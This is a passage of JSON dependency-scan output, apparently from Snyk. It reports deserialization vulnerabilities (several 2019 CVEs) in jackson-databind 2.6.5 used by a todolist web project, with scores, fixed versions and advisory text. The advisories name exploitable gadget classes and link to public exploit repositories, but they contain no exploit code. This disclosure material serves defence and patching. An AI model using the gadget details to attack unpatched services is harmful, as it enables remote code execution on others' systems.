"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:50.734463Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": 
"2024-03-06T14:04:45.683422Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.645685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:50.734463Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", - "epssDetails": { - "percentile": "0.97607", - "probability": "0.53288", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12384" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mph4-vhrx-mv67" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-06-25T10:06:54.889582Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-05-28T10:27:59Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - 
"maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-06-25T10:26:29Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.734463Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.9.2", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", - "title": "GitHub Comparison" - }, - { - "url": 
"https://github.com/FasterXML/jackson-databind/issues/2387", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2389", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2395", - "title": "GitHub Issue" - }, - { - "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", - "title": "Snyk Blog" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:45.849047Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:54.502907Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.033731Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:45.849047Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.502907Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
`SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", - "epssDetails": { - "percentile": "0.83638", - "probability": "0.00984", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14379" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6fpp-rgj9-8rwc", - "GHSA-gwp4-hfv6-p7hw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": 
"2019-07-29T14:55:33.030000Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-07-29T12:40:42Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-07-29T12:40:42Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.502907Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.pr2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": 
"enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2449", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:54.800234Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:53.931793Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:42.808389Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:54.800234Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.931793Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", - "epssDetails": { - "percentile": "0.71702", - "probability": "0.00342", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16335" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-85cw-hj65-qqv9" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T13:03:06.837179Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.pr2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-15T23:30:24Z", 
- "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T23:30:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.931793Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "credit": [ - "iSafeBlue" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", - "title": "Exploit" - }, - { - "url": 
"https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2410", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:47.850814Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.008832Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:42.892322Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:47.850814Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.008832Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", - "epssDetails": { - "percentile": "0.74104", - "probability": "0.00410", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14540" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-h822-r4r5-v8jg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T13:03:10.401907Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - 
"alternativeIds": [], - "disclosureTime": "2019-09-15T23:27:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T23:27:25Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.008832Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.10.0.pr1,2.10.0.pr2)", - "[,2.9.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": 
"https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2420", - "title": "GitHub Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:32.899468Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. 
